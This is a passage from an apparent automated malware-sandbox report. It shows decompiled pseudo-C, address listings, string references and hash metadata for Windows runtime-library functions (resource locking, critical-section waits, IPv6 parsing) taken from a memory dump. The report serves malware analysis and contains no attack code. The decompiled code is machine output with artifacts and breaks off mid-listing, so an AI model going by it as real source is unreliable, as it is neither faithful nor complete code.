                                                    0x022314d6
                                                    0x022314da
                                                    0x022314de
                                                    0x022314e3
                                                    0x0223157a
                                                    0x0223157a
                                                    0x022314f1
                                                    0x022314f3
                                                    0x0225ea0f
                                                    0x00000000
                                                    0x0225ea15
                                                    0x00000000
                                                    0x0225ea15
                                                    0x022314f9
                                                    0x022314f9
                                                    0x022314fe
                                                    0x02231504
                                                    0x0225ea1a
                                                    0x0225ea1f
                                                    0x0225ea21
                                                    0x0225ea22
                                                    0x0225ea27
                                                    0x0225ea2a
                                                    0x0225ea2a
                                                    0x02231515
                                                    0x02231517
                                                    0x0223156d
                                                    0x02231572
                                                    0x02231575
                                                    0x02231575
                                                    0x0223151e
                                                    0x0225ea50
                                                    0x0225ea55
                                                    0x0225ea58
                                                    0x0225ea58
                                                    0x0223152e
                                                    0x02231531
                                                    0x02231533
                                                    0x00000000
                                                    0x02231535
                                                    0x02231541
                                                    0x02231549
                                                    0x02231549
                                                    0x02231533
                                                    0x022314f3
                                                    0x02231559

                                                    APIs
                                                    • ___swprintf_l.LIBCMT ref: 0225EA22
                                                      • Part of subcall function 022313CB: ___swprintf_l.LIBCMT ref: 0223146B
                                                      • Part of subcall function 022313CB: ___swprintf_l.LIBCMT ref: 02231490
                                                    • ___swprintf_l.LIBCMT ref: 0223156D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.687168638.00000000021E0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: true
                                                    • Associated: 00000007.00000002.687160698.00000000021D0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000007.00000002.687257958.00000000022C0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000007.00000002.687263498.00000000022D0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000007.00000002.687269113.00000000022D4000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000007.00000002.687274473.00000000022D7000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000007.00000002.687279694.00000000022E0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000007.00000002.687321106.0000000002340000.00000040.00000001.sdmp Download File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_21d0000_cmd.jbxd
                                                    Similarity
                                                    • API ID: ___swprintf_l
                                                    • String ID: %%%u$]:%u
                                                    • API String ID: 48624451-3050659472
                                                    • Opcode ID: b105134119850998a97d2d5627a923ff8ed8dd989bd9491bc04216e1ae915fa6
                                                    • Instruction ID: c6f414cabe058c392ed69d4e1360cb0a53587c5975f7ac05511178049f988fa2
                                                    • Opcode Fuzzy Hash: b105134119850998a97d2d5627a923ff8ed8dd989bd9491bc04216e1ae915fa6
                                                    • Instruction Fuzzy Hash: C721C5B392022AABDB21DFA4CC40AEE73ACAF54704F444111ED4AD3148DB71AA688BD1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 022153A5, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 185COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 45%
                                                    			E022153A5(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t32;
				signed int _t37;
				signed int _t40;
				signed int _t42;
				void* _t45;
				intOrPtr _t46;
				void* _t48;
				signed int _t49;
				void* _t51;
				signed int _t57;
				signed int _t64;
				signed int _t71;
				void* _t74;
				intOrPtr _t78;
				signed int* _t79;
				void* _t85;
				signed int _t86;
				signed int _t92;
				void* _t104;
				void* _t105;

				_t64 = _a4;
				_t32 =  *(_t64 + 0x28);
				_t71 = _t64 + 0x28;
				_push(_t92);
				if(_t32 < 0) {
					_t78 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t64 + 0x2c)) -  *((intOrPtr*)(_t78 + 0x24));
					if( *((intOrPtr*)(_t64 + 0x2c)) !=  *((intOrPtr*)(_t78 + 0x24))) {
						goto L3;
					} else {
						__eflags = _t32 | 0xffffffff;
						asm("lock xadd [ecx], eax");
						return 1;
					}
				} else {
					L3:
					_push(_t86);
					while(1) {
						L4:
						__eflags = _t32;
						if(_t32 == 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) + 1;
							_t79 = _t64 + 0x24;
							_t71 = 1;
							asm("lock xadd [eax], ecx");
							_t32 =  *(_t64 + 0x28);
							_a4 = _t32;
							__eflags = _t32;
							if(_t32 != 0) {
								L19:
								_t86 = 0;
								__eflags = 0;
								while(1) {
									_t81 =  *(_t64 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t92 =  !( ~( *(_t64 + 0x30) & 1)) & 0x022d01c0;
									_push(_t92);
									_push(0);
									_t37 = E021EF8CC( *((intOrPtr*)(_t64 + 0x20)));
									__eflags = _t37 - 0x102;
									if(_t37 != 0x102) {
										break;
									}
									_t71 =  *(_t92 + 4);
									_t85 =  *_t92;
									_t51 = E02234FC0(_t85, _t71, 0xff676980, 0xffffffff);
									_push(_t85);
									_push(_t51);
									E02243F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t86);
									E02243F92(0x65, 0, "RTL: Resource at %p\n", _t64);
									_t86 = _t86 + 1;
									_t105 = _t104 + 0x28;
									__eflags = _t86 - 2;
									if(__eflags > 0) {
										E0227217A(_t71, __eflags, _t64);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									E02243F92();
									_t104 = _t105 + 0xc;
								}
								__eflags = _t37;
								if(__eflags < 0) {
									_push(_t37);
									E02233915(_t64, _t71, _t81, _t86, _t92, __eflags);
									asm("int3");
									_t40 =  *_t71;
									 *_t71 = 0;
									__eflags = _t40;
									if(_t40 == 0) {
										L1:
										_t42 = E02215384(_t92 + 0x24);
										if(_t42 != 0) {
											goto L31;
										} else {
											goto L2;
										}
									} else {
										_t83 =  *((intOrPtr*)(_t92 + 0x18));
										_push( &_a4);
										_push(_t40);
										_t49 = E021EF970( *((intOrPtr*)(_t92 + 0x18)));
										__eflags = _t49;
										if(__eflags >= 0) {
											goto L1;
										} else {
											_push(_t49);
											E02233915(_t64,  &_a4, _t83, _t86, _t92, __eflags);
											L31:
											_t82 =  *((intOrPtr*)(_t92 + 0x20));
											_push( &_a4);
											_push(1);
											_t42 = E021EF970( *((intOrPtr*)(_t92 + 0x20)));
											__eflags = _t42;
											if(__eflags >= 0) {
												L2:
												return _t42;
											} else {
												_push(_t42);
												E02233915(_t64,  &_a4, _t82, _t86, _t92, __eflags);
												_t73 =  *((intOrPtr*)(_t92 + 0x20));
												_push( &_a4);
												_push(1);
												_t42 = E021EF970( *((intOrPtr*)(_t92 + 0x20)));
												__eflags = _t42;
												if(__eflags >= 0) {
													goto L2;
												} else {
													_push(_t42);
													_t45 = E02233915(_t64, _t73, _t82, _t86, _t92, __eflags);
													asm("int3");
													while(1) {
														_t74 = _t45;
														__eflags = _t45 - 1;
														if(_t45 != 1) {
															break;
														}
														_t86 = _t86 | 0xffffffff;
														_t45 = _t74;
														asm("lock cmpxchg [ebx], edi");
														__eflags = _t45 - _t74;
														if(_t45 != _t74) {
															continue;
														} else {
															_t46 =  *[fs:0x18];
															 *((intOrPtr*)(_t92 + 0x2c)) =  *((intOrPtr*)(_t46 + 0x24));
															return _t46;
														}
														goto L38;
													}
													E02215329(_t74, _t92);
													_push(1);
													_t48 = E022153A5(_t92);
													return _t48;
												}
											}
										}
									}
								} else {
									_t32 =  *(_t64 + 0x28);
									continue;
								}
							} else {
								_t71 =  *_t79;
								__eflags = _t71;
								if(__eflags > 0) {
									while(1) {
										_t57 = _t71;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t57 - _t71;
										if(_t57 == _t71) {
											break;
										}
										_t71 = _t57;
										__eflags = _t57;
										if(_t57 > 0) {
											continue;
										}
										break;
									}
									_t32 = _a4;
									__eflags = _t71;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L19;
								}
							}
						}
						goto L38;
					}
					_t71 = _t71 | 0xffffffff;
					_t32 = 0;
					asm("lock cmpxchg [edx], ecx");
					__eflags = 0;
					if(0 != 0) {
						goto L4;
					} else {
						 *((intOrPtr*)(_t64 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
						return 1;
					}
				}
				L38:
			}


























                                                    0x022153ab
                                                    0x022153ae
                                                    0x022153b1
                                                    0x022153b4
                                                    0x022153b7
                                                    0x022305b6
                                                    0x022305c0
                                                    0x022305c3
                                                    0x00000000
                                                    0x022305c9
                                                    0x022305c9
                                                    0x022305cc
                                                    0x022305d5
                                                    0x022305d5
                                                    0x022153bd
                                                    0x022153bd
                                                    0x022153bd
                                                    0x022153be
                                                    0x022153be
                                                    0x022153be
                                                    0x022153c0
                                                    0x00000000
                                                    0x00000000
                                                    0x02252269
                                                    0x0225226d
                                                    0x02252349
                                                    0x0225234d
                                                    0x02252273
                                                    0x02252276
                                                    0x02252279
                                                    0x0225227e
                                                    0x02252283
                                                    0x02252287
                                                    0x0225228a
                                                    0x0225228d
                                                    0x0225228f
                                                    0x022522bc
                                                    0x022522bc
                                                    0x022522bc
                                                    0x022522be
                                                    0x022522c4
                                                    0x022522cc
                                                    0x022522d0
                                                    0x022522d6
                                                    0x022522d7
                                                    0x022522da
                                                    0x022522df
                                                    0x022522e4
                                                    0x00000000
                                                    0x00000000
                                                    0x022522e6
                                                    0x022522e9
                                                    0x022522f4
                                                    0x022522f9
                                                    0x022522fa
                                                    0x02252305
                                                    0x02252314
                                                    0x02252319
                                                    0x0225231a
                                                    0x0225231d
                                                    0x02252320
                                                    0x02252323
                                                    0x02252323
                                                    0x02252328
                                                    0x0225232d
                                                    0x0225232f
                                                    0x02252331
                                                    0x02252336
                                                    0x02252336
                                                    0x0225233b
                                                    0x0225233d
                                                    0x02252350
                                                    0x02252351
                                                    0x02252356
                                                    0x02252359
                                                    0x02252359
                                                    0x0225235b
                                                    0x0225235d
                                                    0x02215367
                                                    0x0221536b
                                                    0x02215372
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x02252363
                                                    0x02252363
                                                    0x02252369
                                                    0x0225236a
                                                    0x0225236c
                                                    0x02252371
                                                    0x02252373
                                                    0x00000000
                                                    0x02252379
                                                    0x02252379
                                                    0x0225237a
                                                    0x0225237f
                                                    0x0225237f
                                                    0x02252385
                                                    0x02252386
                                                    0x02252389
                                                    0x0225238e
                                                    0x02252390
                                                    0x02215378
                                                    0x0221537c
                                                    0x02252396
                                                    0x02252396
                                                    0x02252397
                                                    0x0225239c
                                                    0x022523a2
                                                    0x022523a3
                                                    0x022523a6
                                                    0x022523ab
                                                    0x022523ad
                                                    0x00000000
                                                    0x022523b3
                                                    0x022523b3
                                                    0x022523b4
                                                    0x022523b9
                                                    0x022523ba
                                                    0x022523ba
                                                    0x022523bc
                                                    0x022523bf
                                                    0x00000000
                                                    0x00000000
                                                    0x02249153
                                                    0x02249158
                                                    0x0224915a
                                                    0x0224915e
                                                    0x02249160
                                                    0x00000000
                                                    0x02249166
                                                    0x02249166
                                                    0x02249171
                                                    0x02249176
                                                    0x02249176
                                                    0x00000000
                                                    0x02249160
                                                    0x022523c6
                                                    0x022523cb
                                                    0x022523ce
                                                    0x022523d7
                                                    0x022523d7
                                                    0x022523ad
                                                    0x02252390
                                                    0x02252373
                                                    0x0225233f
                                                    0x0225233f
                                                    0x00000000
                                                    0x0225233f
                                                    0x02252291
                                                    0x02252291
                                                    0x02252293
                                                    0x02252295
                                                    0x0225229a
                                                    0x022522a1
                                                    0x022522a3
                                                    0x022522a7
                                                    0x022522a9
                                                    0x00000000
                                                    0x00000000
                                                    0x022522ab
                                                    0x022522ad
                                                    0x022522af
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x022522af
                                                    0x022522b1
                                                    0x022522b4
                                                    0x022522b4
                                                    0x022522b6
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x022522b6
                                                    0x0225228f
                                                    0x00000000
                                                    0x0225226d
                                                    0x022153cb
                                                    0x022153ce
                                                    0x022153d0
                                                    0x022153d4
                                                    0x022153d6
                                                    0x00000000
                                                    0x022153d8
                                                    0x022153e3
                                                    0x022153ea
                                                    0x022153ea
                                                    0x022153d6
                                                    0x00000000

                                                    APIs
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 022522F4
                                                    Strings
                                                    • RTL: Re-Waiting, xrefs: 02252328
                                                    • RTL: Resource at %p, xrefs: 0225230B
                                                    • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 022522FC
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.687168638.00000000021E0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: true
                                                    • Associated: 00000007.00000002.687160698.00000000021D0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000007.00000002.687257958.00000000022C0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000007.00000002.687263498.00000000022D0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000007.00000002.687269113.00000000022D4000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000007.00000002.687274473.00000000022D7000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000007.00000002.687279694.00000000022E0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000007.00000002.687321106.0000000002340000.00000040.00000001.sdmp Download File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_21d0000_cmd.jbxd
                                                    Similarity
                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                    • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                    • API String ID: 885266447-871070163
                                                    • Opcode ID: cfd1b7a0fed4398dcadeda7916de8b93a89fe505ac47536409a2bd9f6e7d3748
                                                    • Instruction ID: b03ccd444af500d1dc16353586da1a3140404eaa645e22717d5236834d0ba783
                                                    • Opcode Fuzzy Hash: cfd1b7a0fed4398dcadeda7916de8b93a89fe505ac47536409a2bd9f6e7d3748
                                                    • Instruction Fuzzy Hash: 63510971620712ABDB25DFB4CC80FA673D9AF94324F104259FD55DF288EB71E9428BA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0221EC56, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 145COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 51%
                                                    			E0221EC56(void* __ecx, void* __edx, intOrPtr* __edi, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v24;
				intOrPtr* _v28;
				intOrPtr _v32;
				signed int _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __esi;
				intOrPtr _t38;
				intOrPtr _t39;
				signed int _t40;
				intOrPtr _t42;
				intOrPtr _t43;
				signed int _t44;
				void* _t46;
				intOrPtr _t48;
				signed int _t49;
				intOrPtr _t50;
				intOrPtr _t53;
				signed char _t67;
				void* _t72;
				intOrPtr _t77;
				intOrPtr* _t80;
				intOrPtr _t84;
				intOrPtr* _t85;
				void* _t91;
				void* _t92;
				void* _t93;

				_t80 = __edi;
				_t75 = __edx;
				_t70 = __ecx;
				_t84 = _a4;
				if( *((intOrPtr*)(_t84 + 0x10)) == 0) {
					E0220DA92(__ecx, __edx, __eflags, _t84);
					_t38 =  *((intOrPtr*)(_t84 + 0x10));
				}
				_push(0);
				__eflags = _t38 - 0xffffffff;
				if(_t38 == 0xffffffff) {
					_t39 =  *0x22d793c; // 0x0
					_push(0);
					_push(_t84);
					_t40 = E021F16C0(_t39);
				} else {
					_t40 = E021EF9D4(_t38);
				}
				_pop(_t85);
				__eflags = _t40;
				if(__eflags < 0) {
					_push(_t40);
					E02233915(_t67, _t70, _t75, _t80, _t85, __eflags);
					asm("int3");
					while(1) {
						L21:
						_t76 =  *[fs:0x18];
						_t42 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
						__eflags =  *(_t42 + 0x240) & 0x00000002;
						if(( *(_t42 + 0x240) & 0x00000002) != 0) {
							_v36 =  *(_t85 + 0x14) & 0x00ffffff;
							_v66 = 0x1722;
							_t71 =  *((intOrPtr*)(_t85 + 0xc));
							_t76 =  &_v72;
							_push( &_v72);
							_v28 = _t85;
							_v40 =  *((intOrPtr*)(_t85 + 4));
							_v32 =  *((intOrPtr*)(_t85 + 0xc));
							_push(0x10);
							_push(0x20402);
							E021F01A4( *0x7ffe0382 & 0x000000ff);
						}
						while(1) {
							_t43 = _v8;
							_push(_t80);
							_push(0);
							__eflags = _t43 - 0xffffffff;
							if(_t43 == 0xffffffff) {
								_t71 =  *0x22d793c; // 0x0
								_push(_t85);
								_t44 = E021F1F28(_t71);
							} else {
								_t44 = E021EF8CC(_t43);
							}
							__eflags = _t44 - 0x102;
							if(_t44 != 0x102) {
								__eflags = _t44;
								if(__eflags < 0) {
									_push(_t44);
									E02233915(_t67, _t71, _t76, _t80, _t85, __eflags);
									asm("int3");
									E02272306(_t85);
									__eflags = _t67 & 0x00000002;
									if((_t67 & 0x00000002) != 0) {
										_t7 = _t67 + 2; // 0x4
										_t72 = _t7;
										asm("lock cmpxchg [edi], ecx");
										__eflags = _t67 - _t67;
										if(_t67 == _t67) {
											E0221EC56(_t72, _t76, _t80, _t85);
										}
									}
									return 0;
								} else {
									__eflags = _v24;
									if(_v24 != 0) {
										 *((intOrPtr*)(_v12 + 0xf84)) = 0;
									}
									return 2;
								}
								goto L36;
							}
							_t77 =  *((intOrPtr*)(_t80 + 4));
							_push(_t67);
							_t46 = E02234FC0( *_t80, _t77, 0xff676980, 0xffffffff);
							_push(_t77);
							E02243F92(0x65, 1, "RTL: Enter Critical Section Timeout (%I64u secs) %d\n", _t46);
							_t48 =  *_t85;
							_t92 = _t91 + 0x18;
							__eflags = _t48 - 0xffffffff;
							if(_t48 == 0xffffffff) {
								_t49 = 0;
								__eflags = 0;
							} else {
								_t49 =  *((intOrPtr*)(_t48 + 0x14));
							}
							_t71 =  *((intOrPtr*)(_t85 + 0xc));
							_push(_t49);
							_t50 = _v12;
							_t76 =  *((intOrPtr*)(_t50 + 0x24));
							_push(_t85);
							_push( *((intOrPtr*)(_t85 + 0xc)));
							_push( *((intOrPtr*)(_t50 + 0x24)));
							E02243F92(0x65, 0, "RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu\n",  *((intOrPtr*)(_t50 + 0x20)));
							_t53 =  *_t85;
							_t93 = _t92 + 0x20;
							_t67 = _t67 + 1;
							__eflags = _t53 - 0xffffffff;
							if(_t53 != 0xffffffff) {
								_t71 =  *((intOrPtr*)(_t53 + 0x14));
								_a4 =  *((intOrPtr*)(_t53 + 0x14));
							}
							__eflags = _t67 - 2;
							if(_t67 > 2) {
								__eflags = _t85 - 0x22d20c0;
								if(_t85 != 0x22d20c0) {
									_t76 = _a4;
									__eflags = _a4 - _a8;
									if(__eflags == 0) {
										E0227217A(_t71, __eflags, _t85);
									}
								}
							}
							_push("RTL: Re-Waiting\n");
							_push(0);
							_push(0x65);
							_a8 = _a4;
							E02243F92();
							_t91 = _t93 + 0xc;
							__eflags =  *0x7ffe0382;
							if( *0x7ffe0382 != 0) {
								goto L21;
							}
						}
						goto L36;
					}
				} else {
					return _t40;
				}
				L36:
			}

































                                                    0x0221ec56
                                                    0x0221ec56
                                                    0x0221ec56
                                                    0x0221ec5c
                                                    0x0221ec64
                                                    0x022523e6
                                                    0x022523eb
                                                    0x022523eb
                                                    0x0221ec6a
                                                    0x0221ec6c
                                                    0x0221ec6f
                                                    0x022523f3
                                                    0x022523f8
                                                    0x022523fa
                                                    0x022523fc
                                                    0x0221ec75
                                                    0x0221ec76
                                                    0x0221ec76
                                                    0x0221ec7b
                                                    0x0221ec7c
                                                    0x0221ec7e
                                                    0x02252406
                                                    0x02252407
                                                    0x0225240c
                                                    0x0225240d
                                                    0x0225240d
                                                    0x0225240d
                                                    0x02252414
                                                    0x02252417
                                                    0x0225241e
                                                    0x02252435
                                                    0x02252438
                                                    0x0225243c
                                                    0x0225243f
                                                    0x02252442
                                                    0x02252443
                                                    0x02252446
                                                    0x02252449
                                                    0x02252453
                                                    0x02252455
                                                    0x0225245b
                                                    0x0225245b
                                                    0x0221eb99
                                                    0x0221eb99
                                                    0x0221eb9c
                                                    0x0221eb9d
                                                    0x0221eb9f
                                                    0x0221eba2
                                                    0x02252465
                                                    0x0225246b
                                                    0x0225246d
                                                    0x0221eba8
                                                    0x0221eba9
                                                    0x0221eba9
                                                    0x0221ebae
                                                    0x0221ebb3
                                                    0x0221ebb9
                                                    0x0221ebbb
                                                    0x02252513
                                                    0x02252514
                                                    0x02252519
                                                    0x0225251b
                                                    0x0221ec2a
                                                    0x0221ec2d
                                                    0x0221ec33
                                                    0x0221ec36
                                                    0x0221ec3a
                                                    0x0221ec3e
                                                    0x0221ec40
                                                    0x0221ec47
                                                    0x0221ec47
                                                    0x0221ec40
                                                    0x021f22c6
                                                    0x0221ebc1
                                                    0x0221ebc1
                                                    0x0221ebc5
                                                    0x0221ec9a
                                                    0x0221ec9a
                                                    0x0221ebd6
                                                    0x0221ebd6
                                                    0x00000000
                                                    0x0221ebbb
                                                    0x02252477
                                                    0x0225247c
                                                    0x02252486
                                                    0x0225248b
                                                    0x02252496
                                                    0x0225249b
                                                    0x0225249d
                                                    0x022524a0
                                                    0x022524a3
                                                    0x022524aa
                                                    0x022524aa
                                                    0x022524a5
                                                    0x022524a5
                                                    0x022524a5
                                                    0x022524ac
                                                    0x022524af
                                                    0x022524b0
                                                    0x022524b3
                                                    0x022524b9
                                                    0x022524ba
                                                    0x022524bb
                                                    0x022524c6
                                                    0x022524cb
                                                    0x022524cd
                                                    0x022524d0
                                                    0x022524d1
                                                    0x022524d4
                                                    0x022524d6
                                                    0x022524d9
                                                    0x022524d9
                                                    0x022524dc
                                                    0x022524df
                                                    0x022524e1
                                                    0x022524e7
                                                    0x022524e9
                                                    0x022524ec
                                                    0x022524ef
                                                    0x022524f2
                                                    0x022524f2
                                                    0x022524ef
                                                    0x022524e7
                                                    0x022524fa
                                                    0x022524ff
                                                    0x02252501
                                                    0x02252503
                                                    0x02252506
                                                    0x0225250b
                                                    0x0221eb8c
                                                    0x0221eb93
                                                    0x00000000
                                                    0x00000000
                                                    0x0221eb93
                                                    0x00000000
                                                    0x0221eb99
                                                    0x0221ec85
                                                    0x0221ec85
                                                    0x0221ec85
                                                    0x00000000

                                                    Strings
                                                    • RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 0225248D
                                                    • RTL: Re-Waiting, xrefs: 022524FA
                                                    • RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 022524BD
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.687168638.00000000021E0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: true
                                                    • Associated: 00000007.00000002.687160698.00000000021D0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000007.00000002.687257958.00000000022C0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000007.00000002.687263498.00000000022D0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000007.00000002.687269113.00000000022D4000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000007.00000002.687274473.00000000022D7000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000007.00000002.687279694.00000000022E0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000007.00000002.687321106.0000000002340000.00000040.00000001.sdmp Download File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_21d0000_cmd.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
                                                    • API String ID: 0-3177188983
                                                    • Opcode ID: 6f414fec3b706bb5c0d9b30512d4b8c236d0076c4f7fb9edec130bb1393517b2
                                                    • Instruction ID: 22a58830d38570de28534279b9b524864636b11aedf734d44609b80715af5252
                                                    • Opcode Fuzzy Hash: 6f414fec3b706bb5c0d9b30512d4b8c236d0076c4f7fb9edec130bb1393517b2
                                                    • Instruction Fuzzy Hash: A841B2B0A20215EBD724DFE8CC84F6A77EAAF44720F108705FE659B2C8D774E9418B61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0222FCC9, Relevance: 6.3, APIs: 4, Instructions: 257COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E0222FCC9(signed short* _a4, char _a7, signed short** _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _t105;
				void* _t110;
				char _t114;
				short _t115;
				void* _t118;
				signed short* _t119;
				short _t120;
				char _t122;
				void* _t127;
				void* _t130;
				signed int _t136;
				intOrPtr _t143;
				signed int _t158;
				signed short* _t164;
				signed int _t167;
				void* _t170;

				_t158 = 0;
				_t164 = _a4;
				_v20 = 0;
				_v24 = 0;
				_v8 = 0;
				_v12 = 0;
				_v16 = 0;
				_v28 = 0;
				_t136 = 0;
				while(1) {
					_t167 =  *_t164 & 0x0000ffff;
					if(_t167 == _t158) {
						break;
					}
					_t118 = _v20 - _t158;
					if(_t118 == 0) {
						if(_t167 == 0x3a) {
							if(_v12 > _t158 || _v8 > _t158) {
								break;
							} else {
								_t119 =  &(_t164[1]);
								if( *_t119 != _t167) {
									break;
								}
								_t143 = 2;
								 *((short*)(_a12 + _t136 * 2)) = 0;
								_v28 = 1;
								_v8 = _t143;
								_t136 = _t136 + 1;
								L47:
								_t164 = _t119;
								_v20 = _t143;
								L14:
								if(_v24 == _t158) {
									L19:
									_t164 =  &(_t164[1]);
									_t158 = 0;
									continue;
								}
								if(_v12 == _t158) {
									if(_v16 > 4) {
										L29:
										return 0xc000000d;
									}
									_t120 = E0222EE02(_v24, _t158, 0x10);
									_t170 = _t170 + 0xc;
									 *((short*)(_a12 + _t136 * 2)) = _t120;
									_t136 = _t136 + 1;
									goto L19;
								}
								if(_v16 > 3) {
									goto L29;
								}
								_t122 = E0222EE02(_v24, _t158, 0xa);
								_t170 = _t170 + 0xc;
								if(_t122 > 0xff) {
									goto L29;
								}
								 *((char*)(_v12 + _t136 * 2 + _a12 - 1)) = _t122;
								goto L19;
							}
						}
						L21:
						if(_v8 > 7 || _t167 >= 0x80) {
							break;
						} else {
							if(E0222685D(_t167, 4) == 0) {
								if(E0222685D(_t167, 0x80) != 0) {
									if(_v12 > 0) {
										break;
									}
									_t127 = 1;
									_a7 = 1;
									_v24 = _t164;
									_v20 = 1;
									_v16 = 1;
									L36:
									if(_v20 == _t127) {
										goto L19;
									}
									_t158 = 0;
									goto L14;
								}
								break;
							}
							_a7 = 0;
							_v24 = _t164;
							_v20 = 1;
							_v16 = 1;
							goto L19;
						}
					}
					_t130 = _t118 - 1;
					if(_t130 != 0) {
						if(_t130 == 1) {
							goto L21;
						}
						_t127 = 1;
						goto L36;
					}
					if(_t167 >= 0x80) {
						L7:
						if(_t167 == 0x3a) {
							_t158 = 0;
							if(_v12 > 0 || _v8 > 6) {
								break;
							} else {
								_t119 =  &(_t164[1]);
								if( *_t119 != _t167) {
									_v8 = _v8 + 1;
									L13:
									_v20 = _t158;
									goto L14;
								}
								if(_v28 != 0) {
									break;
								}
								_v28 = _v8 + 1;
								_t143 = 2;
								_v8 = _v8 + _t143;
								goto L47;
							}
						}
						if(_t167 != 0x2e || _a7 != 0 || _v12 > 2 || _v8 > 6) {
							break;
						} else {
							_v12 = _v12 + 1;
							_t158 = 0;
							goto L13;
						}
					}
					if(E0222685D(_t167, 4) != 0) {
						_v16 = _v16 + 1;
						goto L19;
					}
					if(E0222685D(_t167, 0x80) != 0) {
						_v16 = _v16 + 1;
						if(_v12 > 0) {
							break;
						}
						_a7 = 1;
						goto L19;
					}
					goto L7;
				}
				 *_a8 = _t164;
				if(_v12 != 0) {
					if(_v12 != 3) {
						goto L29;
					}
					_v8 = _v8 + 1;
				}
				if(_v28 != 0 || _v8 == 7) {
					if(_v20 != 1) {
						if(_v20 != 2) {
							goto L29;
						}
						 *((short*)(_a12 + _t136 * 2)) = 0;
						L65:
						_t105 = _v28;
						if(_t105 != 0) {
							_t98 = (_t105 - _v8) * 2; // 0x11
							E02208980(_a12 + _t98 + 0x10, _a12 + _t105 * 2, _v8 - _t105 + _v8 - _t105);
							_t110 = 8;
							E021FDFC0(_a12 + _t105 * 2, 0, _t110 - _v8 + _t110 - _v8);
						}
						return 0;
					}
					if(_v12 != 0) {
						if(_v16 > 3) {
							goto L29;
						}
						_t114 = E0222EE02(_v24, 0, 0xa);
						_t170 = _t170 + 0xc;
						if(_t114 > 0xff) {
							goto L29;
						}
						 *((char*)(_v12 + _t136 * 2 + _a12)) = _t114;
						goto L65;
					}
					if(_v16 > 4) {
						goto L29;
					}
					_t115 = E0222EE02(_v24, 0, 0x10);
					_t170 = _t170 + 0xc;
					 *((short*)(_a12 + _t136 * 2)) = _t115;
					goto L65;
				} else {
					goto L29;
				}
			}

























                                                    0x0222fcd1
                                                    0x0222fcd6
                                                    0x0222fcd9
                                                    0x0222fcdc
                                                    0x0222fcdf
                                                    0x0222fce2
                                                    0x0222fce5
                                                    0x0222fce8
                                                    0x0222fceb
                                                    0x0222fced
                                                    0x0222fced
                                                    0x0222fcf3
                                                    0x00000000
                                                    0x00000000
                                                    0x0222fcfc
                                                    0x0222fcfe
                                                    0x0222fdc1
